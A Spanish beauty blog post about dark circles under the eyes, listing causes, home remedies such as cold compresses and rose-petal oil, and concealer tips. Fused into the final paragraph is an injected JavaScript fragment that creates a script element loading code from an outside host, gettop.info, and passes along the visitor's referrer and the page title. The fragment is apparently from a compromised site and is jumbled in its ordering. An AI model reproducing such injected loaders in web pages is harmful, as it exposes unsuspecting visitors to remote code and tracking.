Salud y belleza » Belleza, Salud

Alerta: ¡ojeras!

Sin Comentarios

orejas476_0

 Técnicamente, las ojeras son “alteraciones en la pigmentación de la piel hallada debajo de los ojos que brotan con un color más oscuro de lo normal”.

Ahora, sin tecnicismos, las ojeras son desagradables y molestas manchas que aparecen debajo de los ojos y que no solo nos hacen lucir horribles y cansados sino también nos agregan varios años  de más y nos obligan a colocarnos toneladas de maquillaje.

Como vemos, el ser humano tiene varias formas de definir un mismo objeto o situación (de hecho, ¿si el propio diccionario varía en sus definiciones cómo no lo vamos a hacer nosotros también?). Claro que cualquier definición que ensayemos sobre el término “ojeras” tendrá un punto coincidente: en todos los casos, las ojeras representan un verdadero problema estético.

“Para el organismo las ojeras no son una enfemedad de riesgo aunque sí pueden significar una verdadera molestia. Muchos son los factores que pueden identificarlas y los síntomas son claros: manchas debajo de los ojos las cuales pueden ser de color azul o bordó. Generalmente, las ojeras son causadas por varias circunstancias del siguiente tipo: problemas en el aparato circulatorio, alteraciones hormonales, herencia, vejez y hasta ciertas enfermedades específicas como lo son las alergias, el eccema o la conjuntivitis” expresa una profesional de la salud.

¿Qué métodos existen para deshacernos de ellas? Varios: intentar descansar y reposar una adecuada cantidad de horas; no tomar sol de forma excesiva; llevar a cabo una dieta con alimentos naturales que favorezca la buena circulación; utilizar mascarillas naturales para los ojos; colocar tomates sobre los párpados y reposar durante al menos diez minutos; aplicar durante 5 minutos compresas de agua fría también sobre los párpados pues el frío estimula la circulación.

Otro útil remedio natural consiste en colocar un puñado de pétalos de rosas frescas en un recipiente y cubrir con aceite de almendras. Tapar y filtrar después de 24 horas el aceite a otro frasco. Empapar dos bolitas de algodón con este aceite, extender por los párpados y dejar colocados por 30 minutos.  Luego retirar con otro algodón limpio.

La última opción consiste, directamente, en “disimularlas” con productores estéticos pero, para ello, debemos tener en cuenta algunas cuestiones: utilizar correctores que contengan en sus fórmulas ingredientes hidratantes y protectores solares; no aplicar con la yema de los dedos. Además recuerda siempre, antes de ir a dormir, quitarte todo el maquillaje.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.